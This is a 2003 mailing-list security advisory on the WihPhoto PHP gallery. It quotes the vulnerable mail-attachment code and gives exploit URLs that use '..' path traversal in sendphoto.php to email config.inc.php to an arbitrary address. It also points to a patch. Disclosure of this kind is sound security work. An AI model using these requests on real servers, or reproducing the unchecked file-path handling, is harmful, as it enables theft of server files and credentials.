Vulnwatch mailing list archives
WihPhoto (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 23 Feb 2003 18:44:58 +0100
Informations : °°°°°°°°°°°°°° Version : 0.86-dev Website : http://www.wihsy.com problem : All files from the hard disk can be send by mail PHP Code/Location : °°°°°°°°°°°°°°°°°°° util/email.php : ------------------------------------------------------------------------ <? class CMailFile { var $subject; var $addr_to; var $text_body; var $text_encoded; var $mime_headers; var $mime_boundary = "--==================_846811060==_"; var $smtp_headers;function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) {
$this->subject = $subject; $this->addr_to = $to; $this->smtp_headers = $this->write_smtpheaders($from); $this->text_body = $this->write_body($msg);$this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename);
$this->mime_headers = $this->write_mimeheaders($filename, $mime_filename); } function attach_file($filename,$mimetype,$mime_filename) { $encoded = $this->encode_file($filename); if ($mime_filename) $filename = $mime_filename; $out = "--" . $this->mime_boundary . "\n"; $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n"; $out = $out . "Content-Transfer-Encoding: base64\n";$out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n";
$out = $out . $encoded . "\n"; $out = $out . "--" . $this->mime_boundary . "--" . "\n"; return $out; // added -- to notify email client attachment is done } function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; } function sendfile() { $headers = $this->smtp_headers . $this->mime_headers; $message = $this->text_body . $this->text_encoded; mail($this->addr_to,$this->subject,$message,$headers); } [...] function write_mimeheaders($filename, $mime_filename) { if ($mime_filename) $filename = $mime_filename; $out = "MIME-version: 1.0\n"; $out = $out . "Content-type: multipart/mixed; "; $out = $out . "boundary=\"$this->mime_boundary\"\n"; $out = $out . "Content-transfer-encoding: 7BIT\n"; $out = $out . "X-attachments: $filename;\n\n"; return $out; } [...] } [...] ------------------------------------------------------------------------ sendphoto.php : ------------------------------------------------------------------------ include("util/email.php"); include("config.inc.php"); [...] if (!$filled) { print "<FORM METHOD=POST ACTION=sendphoto.php>\n"; print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n"; print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n"; print "<INPUT TYPE=hidden NAME=album VALUE="; print rawurlencode($album); print ">\n"; print "<center><p>$sendphoto_send_photo_to<br>"; print "<INPUT NAME=sendto></input></center>\n"; print "<p>\n"; print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n"; print "</form>\n"; print "</body></html>\n"; } else { $message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg";$newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
$newmail->sendfile(); print "$sendphoto_successful"; print "</body></html>\n"; } ?> ------------------------------------------------------------------------ Exploits : °°°°°°°°°° http://[target]/sendphoto.php?album=..&pic=config.inc.php or http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent.
Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/WihPhoto.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
Current thread:
- WihPhoto (PHP) Frog Man (Feb 23)